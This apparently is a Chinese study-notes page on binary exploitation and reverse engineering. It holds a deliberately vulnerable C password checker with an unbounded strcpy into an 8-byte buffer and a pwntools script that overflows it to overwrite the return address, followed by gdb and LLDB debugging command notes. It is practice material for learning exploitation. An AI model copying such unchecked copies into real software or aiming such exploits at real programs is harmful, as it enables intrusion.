文件结构

工具的使用

pwn

#include<stdio.h>
#include<string.h>
#define PASSWORD "1234567"
int verify_password(char *password)
{
	int authenticated;
	char buffer[8];

	authenticated=strcmp(password,PASSWORD);
	strcpy(buffer,password);
	return authenticated;
}
void con()
{
	printf ("COngartulation!i\n"); 

}
void main()
{
	int valid_flag=0;
	char password[1024];
	while(1)
	{
		printf("please input password:\n");
		scanf("%s",password);
		valid_flag=verify_password(password);
		if(valid_flag)
		{
			printf("incorrect password!\n");
		}
		else
		{
			con();
			break;
		}

	}

}

from pwn import *

context(log_level="debug")     #显示日志
#0x08049211  为main函数的起始值
ret=0x080491e6  #verify_password的返回地址

payload=b"a"*(24)+p32(ret)+p32(0x08049211)   #这个偏移长度就是返回地址减去局部变量地址
p=process('./pass')
print (p.recv())
pause()
p.send(payload)
p.interactive()

命令格式 x/nfu <addr> 参数解释 n，表示要显示的内存单元的个数 f，表示显示方式, 可取如下值： x 按十六进制格式显示变量 d 按十进制格式显示变量 u 按十进制格式显示无符号整型 o 按八进制格式显示变量 t 按二进制格式显示变量 a 按十六进制格式显示变量 i 指令地址格式 c 按字符格式显示变量 f 按浮点数格式显示变量 u，表示一个地址单元的长度： b 表示单字节 h 表示双字节 w 表示四字节 g 表示八字节

日常翻车

LLDB汇编调试

简介：LLDB是个开源的内置于XCode的调试工具，给我们平时开发调试带来很大的便利，同时它对我们逆向分析别人的APP同样有很大的帮助 内存查看 $memory read 0x地址(缩写是:x) //可以查看寄存器内存 比如str 是把寄存器值写到内存中，可以在前后下断点用memory查看 $memory write 0xaddress 0x65 //写入 寄存器操作 $register write r0 1 $register read //打印寄存器list $p/x $lr // 查看LR funcA调用funcB，funcB结束后，会回到funcA。如果能知道LR的值就知道funcB被谁调用 $p/x $x0 //打印寄存器地址 可以执行运算 比如 p/x 0x0064000 + 0xff $x/10 $sp //打印从栈底开始连续的10个字 一般情况下，oc方法在栈中参数不会超过10个，这个命令就足够了，挨个打印 然后 po address $dis -a 内存地址。 通过内存看函数 拿到内存后可以通过此命令查看汇编代码 $po $x1 $pblock

https://liangmc.com/archives/03lldb%E6%B1%87%E7%BC%96%E8%B0%83%E8%AF%95md

逆向